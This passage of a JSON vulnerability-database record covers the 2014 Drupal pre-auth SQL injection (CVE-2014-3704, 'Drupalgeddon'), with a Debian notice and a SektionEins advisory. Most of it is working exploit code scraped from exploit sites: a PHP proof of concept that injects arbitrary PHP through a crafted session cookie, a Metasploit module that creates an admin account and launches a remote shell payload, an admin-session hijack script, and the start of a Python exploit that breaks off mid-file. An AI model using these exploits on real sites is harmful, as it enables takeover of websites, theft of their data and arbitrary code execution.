wheezy-backports distribution the problems have been fixed in\nversion 7.32-1~bpo70+1.\n", "edition": 2, "modified": "2014-10-18T09:02:20", "published": "2014-10-18T09:02:20", "id": "DEBIAN:BSA-098:467CD", "href": "https://lists.debian.org/debian-backports-announce/2014/debian-backports-announce-201410/msg00000.html", "title": "[BSA-098] Security update for drupal7", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-02-17T21:22:38", "description": "Exploit for php platform in category web applications", "edition": 2, "published": "2014-11-04T00:00:00", "type": "zdt", "title": "Drupal < 7.32 Pre Auth SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3704"], "modified": "2014-11-04T00:00:00", "id": "1337DAY-ID-22814", "href": "https://0day.today/exploit/description/22814", "sourceData": "<?php\r\n// _____ __ __ _ _______\r\n// / ___/___ / /__/ /_(_)___ ____ / ____(_)___ _____\r\n// \\__ \\/ _ \\/ //_/ __/ / __ \\/ __ \\/ __/ / / __ \\/ ___/\r\n// ___/ / __/ ,< / /_/ / /_/ / / / / /___/ / / / (__ )\r\n// /____/\\___/_/|_|\\__/_/\\____/_/ /_/_____/_/_/ /_/____/\r\n// Poc for Drupal Pre Auth SQL Injection - (c) 2014 SektionEins\r\n//\r\n// created by Stefan Horst <[email\u00a0protected]>\r\n// and Stefan Esser <[email\u00a0protected]>\r\n//\u00b7\r\n \r\ninclude 'common.inc';\r\ninclude 'password.inc';\r\n \r\n// set values\r\n$user_id = 0;\r\n$user_name = '';\r\n \r\n$code_inject = 'phpinfo();session_destroy();die(\"\");';\r\n \r\n$url = isset($argv[1])?$argv[1]:'';\r\n$code = isset($argv[2])?$argv[2]:'';\r\n \r\nif ($url == '-h') {\r\n echo \"usage:\\n\";\r\n echo $argv[0].' $url [$code|$file]'.\"\\n\";\r\n die();\r\n}\r\n \r\nif (empty($url) || strpos($url,'https') === False) {\r\n echo \"please state the cookie url. It works only with https urls.\\n\";\r\n die();\r\n}\r\n \r\nif (!empty($code)) {\r\n if (is_file($code)) {\r\n $code_inject = str_replace('<'.'?','',str_replace('<'.'?php','',str_replace('?'.'>','',file_get_contents($code))));\r\n } else {\r\n $code_inject = $code;\r\n }\r\n}\r\n \r\n$code_inject = rtrim($code_inject,';');\r\n$code_inject .= ';session_destroy();die(\"\");';\r\n \r\nif (strpos($url, 'www.') === 0) {\r\n $url = substr($url, 4);\r\n}\r\n \r\n$_SESSION= array('a'=>'eval(base64_decode(\"'.base64_encode($code_inject).'\"))','build_info' => array(), 'wrapper_callback' => 'form_execute_handlers', '#Array' => array('array_filter'), 'string' => 'assert');\r\n$_SESSION['build_info']['args'][0] = &$_SESSION['string'];\r\n \r\nlist( , $session_name) = explode('://', $url, 2);\r\n \r\n// use insecure cookie with sql inj.\r\n$cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32);\r\n$password = user_hash_password('test');\r\n \r\n$session_id = drupal_random_key();\r\n$sec_ssid = drupal_random_key();\r\n \r\n$serial = str_replace('}','CURLYCLOSE',str_replace('{','CURLYOPEN',\"batch_form_state|\".serialize($_SESSION)));\r\n$inject = \"UNION SELECT $user_id,'$user_name','$password','','','',null,0,0,0,1,null,'',0,'',null,$user_id,'$session_id','','127.0.0.1',0,0,REPLACE(REPLACE('\".$serial.\"','CURLYCLOSE',CHAR(\".ord('}').\")),'CURLYOPEN',CHAR(\".ord('{').\")) -- \";\r\n \r\n$cookie = $cookieName.'[test+'.urlencode($inject).']='.$session_id.'; '.$cookieName.'[test]='.$session_id.'; S'.$cookieName.'='.$sec_ssid;\r\n \r\n$ch = curl_init($url);\r\n \r\ncurl_setopt($ch,CURLOPT_HEADER,True);\r\ncurl_setopt($ch,CURLOPT_RETURNTRANSFER,True);\r\ncurl_setopt($ch,CURLOPT_SSL_VERIFYPEER,False);\r\ncurl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0');\r\n \r\ncurl_setopt($ch,CURLOPT_HTTPHEADER,array(\r\n 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n 'Accept-Language: en-US,en;q=0.5'\r\n));\r\n \r\ncurl_setopt($ch,CURLOPT_COOKIE,$cookie);\r\n \r\n$output = curl_exec($ch);\r\n \r\ncurl_close($ch);\r\n \r\necho $output;\n\n# 0day.today [2018-02-17] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22814"}, {"lastseen": "2018-03-28T11:15:41", "description": "This Metasploit module exploits the Drupal HTTP Parameter Key/Value SQL Injection (aka Drupageddon) in order to achieve a remote shell on the vulnerable instance. This Metasploit module was tested against Drupal 7.0 and 7.31 (was fixed in 7.32).", "edition": 2, "published": "2014-10-18T00:00:00", "type": "zdt", "title": "Drupal HTTP Parameter Key/Value SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3704"], "modified": "2014-10-18T00:00:00", "id": "1337DAY-ID-22771", "href": "https://0day.today/exploit/description/22771", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'Drupal HTTP Parameter Key/Value SQL Injection',\r\n 'Description' => %q{\r\n This module exploits the Drupal HTTP Parameter Key/Value SQL Injection\r\n (aka Drupageddon) in order to achieve a remote shell on the vulnerable\r\n instance. This module was tested against Drupal 7.0 and 7.31 (was fixed\r\n in 7.32).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'SektionEins', # discovery\r\n 'Christian Mehlmauer', # msf module\r\n 'Brandon Perry' # msf module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-3704'],\r\n ['URL', 'https://www.drupal.org/SA-CORE-2014-005'],\r\n ['URL', 'http://www.sektioneins.de/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html']\r\n ],\r\n 'Privileged' => false,\r\n 'Platform' => ['php'],\r\n 'Arch' => ARCH_PHP,\r\n 'Targets' => [['Drupal 7.0 - 7.31',{}]],\r\n 'DisclosureDate' => 'Oct 15 2014',\r\n 'DefaultTarget' => 0\r\n ))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [ true, \"The target URI of the Drupal installation\", '/'])\r\n ], self.class)\r\n\r\n register_advanced_options(\r\n [\r\n OptString.new('ADMIN_ROLE', [ true, \"The administrator role\", 'administrator']),\r\n OptInt.new('ITER', [ true, \"Hash iterations (2^ITER)\", 10])\r\n ], self.class)\r\n end\r\n\r\n def uri_path\r\n normalize_uri(target_uri.path)\r\n end\r\n\r\n def admin_role\r\n datastore['ADMIN_ROLE']\r\n end\r\n\r\n def iter\r\n datastore['ITER']\r\n end\r\n\r\n def itoa64\r\n './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'\r\n end\r\n\r\n # PHPs PHPASS base64 method\r\n def phpass_encode64(input, count)\r\n out = ''\r\n cur = 0\r\n while cur < count\r\n value = input[cur].ord\r\n cur += 1\r\n out << itoa64[value & 0x3f]\r\n if cur < count\r\n value |= input[cur].ord << 8\r\n end\r\n out << itoa64[(value >> 6) & 0x3f]\r\n break if cur >= count\r\n cur += 1\r\n\r\n if cur < count\r\n value |= input[cur].ord << 16\r\n end\r\n out << itoa64[(value >> 12) & 0x3f]\r\n break if cur >= count\r\n cur += 1\r\n out << itoa64[(value >> 18) & 0x3f]\r\n end\r\n out\r\n end\r\n\r\n def generate_password_hash(pass)\r\n # Syntax for MD5:\r\n # $P$ = MD5\r\n # one char representing the hash iterations (min 7)\r\n # 8 chars salt\r\n # MD5_raw(salt.pass) + iterations\r\n # MD5 phpass base64 encoded (!= encode_base64) and trimmed to 22 chars for md5\r\n iter_char = itoa64[iter]\r\n salt = Rex::Text.rand_text_alpha(8)\r\n md5 = Rex::Text.md5_raw(\"#{salt}#{pass}\")\r\n # convert iter from log2 to integer\r\n iter_count = 2**iter\r\n 1.upto(iter_count) {\r\n md5 = Rex::Text.md5_raw(\"#{md5}#{pass}\")\r\n }\r\n md5_base64 = phpass_encode64(md5, md5.length)\r\n md5_stripped = md5_base64[0...22]\r\n pass = \"$P\\\\$\" + iter_char + salt + md5_stripped\r\n vprint_debug(\"#{peer} - password hash: #{pass}\")\r\n\r\n return pass\r\n end\r\n\r\n def sql_insert_user(user, pass)\r\n \"insert into users (uid, name, pass, mail, status) select max(uid)+1, '#{user}', '#{generate_password_hash(pass)}', '#{Rex::Text.rand_text_alpha_lower(5)}@#{Rex::Text.rand_text_alpha_lower(5)}.#{Rex::Text.rand_text_alpha_lower(3)}', 1 from users\"\r\n end\r\n\r\n def sql_make_user_admin(user)\r\n \"insert into users_roles (uid, rid) VALUES ((select uid from users where name='#{user}'), (select rid from role where name = '#{admin_role}'))\"\r\n end\r\n\r\n def extract_form_ids(content)\r\n form_build_id = $1 if content =~ /name=\"form_build_id\" value=\"(.+)\" \\/>/\r\n form_token = $1 if content =~ /name=\"form_token\" value=\"(.+)\" \\/>/\r\n\r\n vprint_debug(\"#{peer} - form_build_id: #{form_build_id}\")\r\n vprint_debug(\"#{peer} - form_token: #{form_token}\")\r\n\r\n return form_build_id, form_token\r\n end\r\n\r\n def exploit\r\n\r\n # TODO: Check if option admin_role exists via admin/people/permissions/roles\r\n\r\n # call login page to extract tokens\r\n print_status(\"#{peer} - Testing page\")\r\n res = send_request_cgi({\r\n 'uri' => uri_path,\r\n 'vars_get' => {\r\n 'q' => 'user/login'\r\n }\r\n })\r\n\r\n unless res and res.body\r\n fail_with(Failure::Unknown, \"No response or response body, bailing.\")\r\n end\r\n\r\n form_build_id, form_token = extract_form_ids(res.body)\r\n\r\n user = Rex::Text.rand_text_alpha(10)\r\n pass = Rex::Text.rand_text_alpha(10)\r\n\r\n post = {\r\n \"name[0 ;#{sql_insert_user(user, pass)}; #{sql_make_user_admin(user)}; # ]\" => Rex::Text.rand_text_alpha(10),\r\n 'name[0]' => Rex::Text.rand_text_alpha(10),\r\n 'pass' => Rex::Text.rand_text_alpha(10),\r\n 'form_build_id' => form_build_id,\r\n 'form_id' => 'user_login',\r\n 'op' => 'Log in'\r\n }\r\n\r\n print_status(\"#{peer} - Creating new user #{user}:#{pass}\")\r\n res = send_request_cgi({\r\n 'uri' => uri_path,\r\n 'method' => 'POST',\r\n 'vars_post' => post,\r\n 'vars_get' => {\r\n 'q' => 'user/login'\r\n }\r\n })\r\n\r\n unless res and res.body\r\n fail_with(Failure::Unknown, \"No response or response body, bailing.\")\r\n end\r\n\r\n # login\r\n print_status(\"#{peer} - Logging in as #{user}:#{pass}\")\r\n res = send_request_cgi({\r\n 'uri' => uri_path,\r\n 'method' => 'POST',\r\n 'vars_post' => {\r\n 'name' => user,\r\n 'pass' => pass,\r\n 'form_build_id' => form_build_id,\r\n 'form_id' => 'user_login',\r\n 'op' => 'Log in'\r\n },\r\n 'vars_get' => {\r\n 'q' => 'user/login'\r\n }\r\n })\r\n\r\n unless res and res.code == 302\r\n fail_with(Failure::Unknown, \"No response or response body, bailing.\")\r\n end\r\n\r\n cookie = res.get_cookies\r\n vprint_debug(\"#{peer} - cookie: #{cookie}\")\r\n\r\n # call admin interface to extract CSRF token and enabled modules\r\n print_status(\"#{peer} - Trying to parse enabled modules\")\r\n res = send_request_cgi({\r\n 'uri' => uri_path,\r\n 'vars_get' => {\r\n 'q' => 'admin/modules'\r\n },\r\n 'cookie' => cookie\r\n })\r\n\r\n form_build_id, form_token = extract_form_ids(res.body)\r\n\r\n enabled_module_regex = /name=\"(.+)\" value=\"1\" checked=\"checked\" class=\"form-checkbox\"/\r\n enabled_matches = res.body.to_enum(:scan, enabled_module_regex).map { Regexp.last_match }\r\n\r\n unless enabled_matches\r\n fail_with(Failure::Unknown, \"No modules enabled is incorrect, bailing.\")\r\n end\r\n\r\n post = {\r\n 'modules[Core][php][enable]' => '1',\r\n 'form_build_id' => form_build_id,\r\n 'form_token' => form_token,\r\n 'form_id' => 'system_modules',\r\n 'op' => 'Save configuration'\r\n }\r\n\r\n enabled_matches.each do |match|\r\n post[match.captures[0]] = '1'\r\n end\r\n\r\n # enable PHP filter\r\n print_status(\"#{peer} - Enabling the PHP filter module\")\r\n res = send_request_cgi({\r\n 'uri' => uri_path,\r\n 'method' => 'POST',\r\n 'vars_post' => post,\r\n 'vars_get' => {\r\n 'q' => 'admin/modules/list/confirm'\r\n },\r\n 'cookie' => cookie\r\n })\r\n\r\n unless res and res.body\r\n fail_with(Failure::Unknown, \"No response or response body, bailing.\")\r\n end\r\n\r\n # Response: http 302, Location: http://10.211.55.50/?q=admin/modules\r\n\r\n print_status(\"#{peer} - Setting permissions for PHP filter module\")\r\n\r\n # allow admin to use php_code\r\n res = send_request_cgi({\r\n 'uri' => uri_path,\r\n 'vars_get' => {\r\n 'q' => 'admin/people/permissions'\r\n },\r\n 'cookie' => cookie\r\n })\r\n\r\n\r\n unless res and res.body\r\n fail_with(Failure::Unknown, \"No response or response body, bailing.\")\r\n end\r\n\r\n form_build_id, form_token = extract_form_ids(res.body)\r\n\r\n perm_regex = /name=\"(.*)\" value=\"(.*)\" checked=\"checked\"/\r\n enabled_perms = res.body.to_enum(:scan, perm_regex).map { Regexp.last_match }\r\n\r\n unless enabled_perms\r\n fail_with(Failure::Unknown, \"No enabled permissions were able to be parsed, bailing.\")\r\n end\r\n\r\n # get administrator role id\r\n id = $1 if res.body =~ /for=\"edit-([0-9]+)-administer-content-types\">#{admin_role}:/\r\n vprint_debug(\"#{peer} - admin role id: #{id}\")\r\n\r\n unless id\r\n fail_with(Failure::Unknown, \"Could not parse out administrator ID\")\r\n end\r\n\r\n post = {\r\n \"#{id}[use text format php_code]\" => 'use text format php_code',\r\n 'form_build_id' => form_build_id,\r\n 'form_token' => form_token,\r\n 'form_id' => 'user_admin_permissions',\r\n 'op' => 'Save permissions'\r\n }\r\n\r\n enabled_perms.each do |match|\r\n post[match.captures[0]] = match.captures[1]\r\n end\r\n\r\n res = send_request_cgi({\r\n 'uri' => uri_path,\r\n 'method' => 'POST',\r\n 'vars_post' => post,\r\n 'vars_get' => {\r\n 'q' => 'admin/people/permissions'\r\n },\r\n 'cookie' => cookie\r\n })\r\n\r\n unless res and res.body\r\n fail_with(Failure::Unknown, \"No response or response body, bailing.\")\r\n end\r\n\r\n # Add new Content page (extract csrf token)\r\n print_status(\"#{peer} - Getting tokens from create new article page\")\r\n res = send_request_cgi({\r\n 'uri' => uri_path,\r\n 'vars_get' => {\r\n 'q' => 'node/add/article'\r\n },\r\n 'cookie' => cookie\r\n })\r\n\r\n unless res and res.body\r\n fail_with(Failure::Unknown, \"No response or response body, bailing.\")\r\n end\r\n\r\n form_build_id, form_token = extract_form_ids(res.body)\r\n\r\n # Preview to trigger the payload\r\n data = Rex::MIME::Message.new\r\n data.add_part(Rex::Text.rand_text_alpha(10), nil, nil, 'form-data; name=\"title\"')\r\n data.add_part(form_build_id, nil, nil, 'form-data; name=\"form_build_id\"')\r\n data.add_part(form_token, nil, nil, 'form-data; name=\"form_token\"')\r\n data.add_part('article_node_form', nil, nil, 'form-data; name=\"form_id\"')\r\n data.add_part('php_code', nil, nil, 'form-data; name=\"body[und][0][format]\"')\r\n data.add_part(\"<?php #{payload.encoded} ?>\", nil, nil, 'form-data; name=\"body[und][0][value]\"')\r\n data.add_part('Preview', nil, nil, 'form-data; name=\"op\"')\r\n data.add_part(user, nil, nil, 'form-data; name=\"name\"')\r\n data.add_part('1', nil, nil, 'form-data; name=\"status\"')\r\n data.add_part('1', nil, nil, 'form-data; name=\"promote\"')\r\n post_data = data.to_s\r\n\r\n print_status(\"#{peer} - Calling preview page. Exploit should trigger...\")\r\n send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => uri_path,\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => post_data,\r\n 'vars_get' => {\r\n 'q' => 'node/add/article'\r\n },\r\n 'cookie' => cookie\r\n )\r\n end\r\nend\n\n# 0day.today [2018-03-28] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22771"}, {"lastseen": "2018-04-03T01:37:06", "edition": 2, "description": "Exploit for php platform in category web applications", "published": "2014-10-17T00:00:00", "type": "zdt", "title": "Drupal 7.31 CORE pre Auth SQL Injection Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3704"], "modified": "2014-10-17T00:00:00", "id": "1337DAY-ID-22762", "href": "https://0day.today/exploit/description/22762", "sourceData": "Advisory: Drupal - pre-auth SQL Injection Vulnerability\r\nRelease Date: 2014/10/15\r\nLast Modified: 2014/10/15\r\nAuthor: Stefan Horst\r\n\r\nApplication: Drupal >= 7.0 <= 7.31\r\nSeverity: Full SQL injection, which results in total control and code execution of Website.\r\nRisk: Highly Critical\r\nVendor Status: Drupal 7.32 fixed this bug\r\nReference:\r\nhttp://www.sektioneins.com/en/advisories/advisory-012014-drupal-pre-auth-sql-injection-vulnerability.html\r\n\r\nOverview:\r\n\r\nQuote from http://www.drupal.org\r\n\"Come for the software, stay for the community\r\n\r\nDrupal is an open source content management platform powering millions\r\nof websites and applications. It&#8217;s built, used, and supported by an\r\nactive and diverse community of people around the world.\"\r\n\r\nDuring a code audit of Drupal extensions for a customer an SQL Injection\r\nwas found in the way the Drupal core handles prepared statements.\r\n\r\nA malicious user can inject arbitrary SQL queries. And thereby\r\ncontrol the complete Drupal site. This leads to a code execution as well.\r\n\r\nThis vulnerability can be exploited by remote attackers without any\r\nkind of authentication required.\r\n\r\nDetails:\r\n\r\nDrupal uses prepared statements in all its SQL queries. To handle IN\r\nstatements there is an expandArguments function to expand arrays.\r\n\r\nprotected function expandArguments(&$query, &$args) {\r\n$modified = FALSE;\r\n\r\n// If the placeholder value to insert is an array, assume that we need\r\n// to expand it out into a comma-delimited set of placeholders.\r\nforeach (array_filter($args, 'is_array') as $key => $data) {\r\n$new_keys = array();\r\nforeach ($data as $i => $value) {\r\n// This assumes that there are no other placeholders that use the same\r\n// name. For example, if the array placeholder is defined as :example\r\n// and there is already an :example_2 placeholder, this will generate\r\n// a duplicate key. We do not account for that as the calling code\r\n// is already broken if that happens.\r\n$new_keys[$key . '_' . $i] = $value;\r\n}\r\n\r\n// Update the query with the new placeholders.\r\n// preg_replace is necessary to ensure the replacement does not affect\r\n// placeholders that start with the same exact text. For example, if the\r\n// query contains the placeholders :foo and :foobar, and :foo has an\r\n// array of values, using str_replace would affect both placeholders,\r\n// but using the following preg_replace would only affect :foo because\r\n// it is followed by a non-word character.\r\n$query = preg_replace('#' . $key . '\\b#', implode(', ', array_keys($new_keys)), $query);\r\n\r\n// Update the args array with the new placeholders.\r\nunset($args[$key]);\r\n$args += $new_keys;\r\n\r\n$modified = TRUE;\r\n}\r\n\r\nreturn $modified;\r\n}\r\n\r\nThe function assumes that it is called with an array which has no keys. Example:\r\n\r\ndb_query(\"SELECT * FROM {users} where name IN (:name)\", array(':name'=>array('user1','user2')));\r\n\r\nWhich results in this SQL Statement\r\n\r\nSELECT * from users where name IN (:name_0, :name_1)\r\n\r\nwith the parameters name_0 = user1 and name_1 = user2.\r\n\r\nThe Problem occurs, if the array has keys, which are no integers. Example:\r\n\r\ndb_query(\"SELECT * FROM {users} where name IN (:name)\", array(':name'=>array('test -- ' =>\r\n'user1','test' => 'user2')));\r\n\r\nthis results in an exploitable SQL query:\r\n\r\nSELECT * FROM users WHERE name = :name_test -- , :name_test AND status = 1\r\n\r\nwith parameters :name_test = user2.\r\n\r\nSince Drupal uses PDO, multi-queries are allowed. So this SQL Injection can\r\nbe used to insert arbitrary data in the database, dump or modify existing data\r\nor drop the whole database.\r\n\r\nWith the possibility to INSERT arbitrary data into the database an\r\nattacker can execute any PHP code through Drupal features with callbacks.\r\n\r\nPatch:\r\n\r\n$new_keys = array();\r\nforeach (array_values($data) as $i => $value) {\r\n// This assumes that there are no other placeholders that use the same\r\n// name. For example, if the array placeholder is defined as :example\r\n// and there is already an :example_2 placeholder, this will generate\r\n// a duplicate key. We do not account for that as the calling code\r\n// is already broken if that happens.\r\n$new_keys[$key . '_' . $i] = $value;\r\n}\r\n\r\nProof of Concept:\r\n\r\nSektionEins GmbH has developed a proof of concept, but was asked by\r\nDrupal to postpone the release.\r\n\r\nDisclosure Timeline:\r\n\r\n16. Sep. 2014 - Notified the Drupal devs via security contact form\r\n15. Okt. 2014 - Relase of Bugfix by Drupal core Developers\r\n\r\nRecommendation:\r\n\r\nIt is recommended to upgrade to the latest version of Drupal.\r\n\r\nGrab your copy at:\r\nhttps://www.drupal.org/project/drupal\n\n# 0day.today [2018-04-03] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/22762"}, {"lastseen": "2018-03-31T01:27:02", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2018-03-29T00:00:00", "type": "zdt", "title": "Drupal 7.0 < 7.31 - Drupalgeddon SQL Injection (Admin Session) Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3704"], "modified": "2018-03-29T00:00:00", "href": "https://0day.today/exploit/description/30061", "id": "1337DAY-ID-30061", "sourceData": "<?php\r\n// _____ __ __ _ _______\r\n// / ___/___ / /__/ /_(_)___ ____ / ____(_)___ _____\r\n// \\__ \\/ _ \\/ //_/ __/ / __ \\/ __ \\/ __/ / / __ \\/ ___/\r\n// ___/ / __/ ,< / /_/ / /_/ / / / / /___/ / / / (__ )\r\n// /____/\\___/_/|_|\\__/_/\\____/_/ /_/_____/_/_/ /_/____/\r\n// Poc for Drupal Pre Auth SQL Injection - (c) 2014 SektionEins\r\n//\r\n// created by Stefan Horst <[email\u00a0protected]>\r\n//\u00b7\r\n \r\ninclude 'common.inc';\r\ninclude 'password.inc';\r\n \r\n// set values\r\n$user_name = 'admin';\r\n \r\n$url = isset($argv[1])?$argv[1]:'';\r\n$user_id = isset($argv[2])?intval($argv[2]):1;\r\n \r\nif ($url == '-h') {\r\n echo \"usage:\\n\";\r\n echo $argv[0].' $url [$user_id]'.\"\\n\";\r\n die();\r\n}\r\n \r\nif (empty($url) || strpos($url,'https') === False) {\r\n echo \"please state the cookie url. It works only with https urls.\\n\";\r\n die();\r\n}\r\n \r\nif (strpos($url, 'www.') === 0) {\r\n $url = substr($url, 4);\r\n}\r\n \r\n$url = rtrim($url,'/');\r\n \r\nlist( , $session_name) = explode('://', $url, 2);\r\n \r\n// use insecure cookie with sql inj.\r\n$cookieName = 'SESS' . substr(hash('sha256', $session_name), 0, 32);\r\n$password = user_hash_password('test');\r\n \r\n$session_id = drupal_random_key();\r\n$sec_ssid = drupal_random_key();\r\n \r\n$inject = \"UNION SELECT $user_id,'$user_name','$password','','','',null,0,0,0,1,null,'',0,'',null,$user_id,'$session_id','','127.0.0.1',0,0,null -- \";\r\n \r\n$cookie = $cookieName.'[test+'.urlencode($inject).']='.$session_id.'; '.$cookieName.'[test]='.$session_id.'; S'.$cookieName.'='.$sec_ssid;\r\n \r\n// send the request to the server\r\n$ch = curl_init($url);\r\n \r\ncurl_setopt($ch,CURLOPT_HEADER,True);\r\ncurl_setopt($ch,CURLOPT_RETURNTRANSFER,True);\r\ncurl_setopt($ch,CURLOPT_SSL_VERIFYPEER,False);\r\ncurl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:34.0) Gecko/20100101 Firefox/34.0');\r\n \r\ncurl_setopt($ch,CURLOPT_HTTPHEADER,array(\r\n 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\r\n 'Accept-Language: en-US,en;q=0.5'\r\n));\r\n \r\ncurl_setopt($ch,CURLOPT_COOKIE,$cookie);\r\n \r\n$output = curl_exec($ch);\r\n \r\ncurl_close($ch);\r\n \r\necho \"Session with this ID created:\\n\";\r\necho \"S\".$cookieName.\": \".$sec_ssid;\n\n# 0day.today [2018-03-31] #", "sourceHref": "https://0day.today/exploit/30061", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T13:10:04", "description": "No description provided by source.", "published": "2014-11-13T00:00:00", "type": "seebug", "title": "Drupal Core <= 7.32 - SQL Injection (#2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-3704"], "modified": "2014-11-13T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-87363", "id": "SSV:87363", "sourceData": "\n #!/usr/bin/python\r\n#\r\n# \r\n# Drupal 7.x SQL Injection SA-CORE-2014-005 https://www.drupal.org/SA-CORE-2014-005\r\n# Inspired by yukyuk's P.o.C (https://www.reddit.com/user/fyukyuk)\r\n#\r\n# Tested on Drupal 7.31 with BackBox 3.x\r\n#\r\n# This material is intended for educational \r\n# purposes only and the author can not be held liable for \r\n# any kind of damages done whatsoever to your machine, \r\n# or damages caused by some other,creative application of this material.\r\n# In any case you disagree with the above statement,stop here.\r\n \r\nimport hashlib, urllib2, optparse, random, sys\r\n \r\n# START - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py\r\n# Calculate a non-truncated Drupal 7 compatible password hash.\r\n# The consumer of these hashes must truncate correctly.\r\n \r\nclass DrupalHash:\r\n \r\n def __init__(self, stored_hash, password):\r\n self.itoa64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'\r\n self.last_hash = self.rehash(stored_hash, password)\r\n \r\n def get_hash(self):\r\n return self.last_hash\r\n \r\n def password_get_count_log2(self, setting):\r\n return self.itoa64.index(setting[3])\r\n \r\n def password_crypt(self, algo, password, setting):\r\n setting = setting[0:12]\r\n if setting[0] != '$' or setting[2] != '$':\r\n return False\r\n \r\n count_log2 = self.password_get_count_log2(setting)\r\n salt = setting[4:12]\r\n if len(salt) &lt; 8:\r\n return False\r\n count = 1 &lt;&lt; count_log2\r\n \r\n if algo == 'md5':\r\n hash_func = hashlib.md5\r\n elif algo == 'sha512':\r\n hash_func = hashlib.sha512\r\n else:\r\n return False\r\n hash_str = hash_func(salt + password).digest()\r\n for c in range(count):\r\n hash_str = hash_func(hash_str + password).digest()\r\n output = setting + self.custom64(hash_str)\r\n return output\r\n \r\n def custom64(self, string, count = 0):\r\n if count == 0:\r\n count = len(string)\r\n output = ''\r\n i = 0\r\n itoa64 = self.itoa64\r\n while 1:\r\n value = ord(string[i])\r\n i += 1\r\n output += itoa64[value &amp; 0x3f]\r\n if i &lt; count:\r\n value |= ord(string[i]) &lt;&lt; 8\r\n output += itoa64[(value &gt;&gt; 6) &amp; 0x3f]\r\n if i &gt;= count:\r\n break\r\n i += 1\r\n if i &lt; count:\r\n value |= ord(string[i]) &lt;&lt; 16\r\n output += itoa64[(value &gt;&gt; 12) &amp; 0x3f]\r\n if i &gt;= count:\r\n break\r\n i += 1\r\n output += itoa64[(value &gt;&gt; 18) &amp; 0x3f]\r\n if i &gt;= count:\r\n break\r\n return output\r\n \r\n def rehash(self, stored_hash, password):\r\n # Drupal 6 compatibility\r\n if len(stored_hash) == 32 and stored_hash.find('$') == -1:\r\n return hashlib.md5(password).hexdigest()\r\n # Drupal 7\r\n if stored_hash[0:2] == 'U$':\r\n stored_hash = stored_hash[1:]\r\n password = hashlib.md5(password).hexdigest()\r\n hash_type = stored_hash[0:3]\r\n if hash_type == '$S$':\r\n hash_str = self.password_crypt('sha512', password, stored_hash)\r\n elif hash_type == '$H$' or hash_type == '$P$':\r\n hash_str = self.password_crypt('md5', password, stored_hash)\r\n else:\r\n hash_str = False\r\n return hash_str\r\n# END - from drupalpass import DrupalHash # https://github.com/cvangysel/gitexd-drupalorg/blob/master/drupalorg/drupalpass.py\r\n \r\ndef randomAgentGen():\r\n \r\n userAgent = ['Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',\r\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4 AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',\r\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.77.4 (KHTML, like Gecko) Version/7.0.5 Safari/537.77.4',\r\n 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',\r\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0',\r\n 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0',\r\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:31.0) Gecko/20100101 Firefox/31.0',\r\n 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',\r\n 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_2 like Mac OS X) AppleWebKit/537.51.2 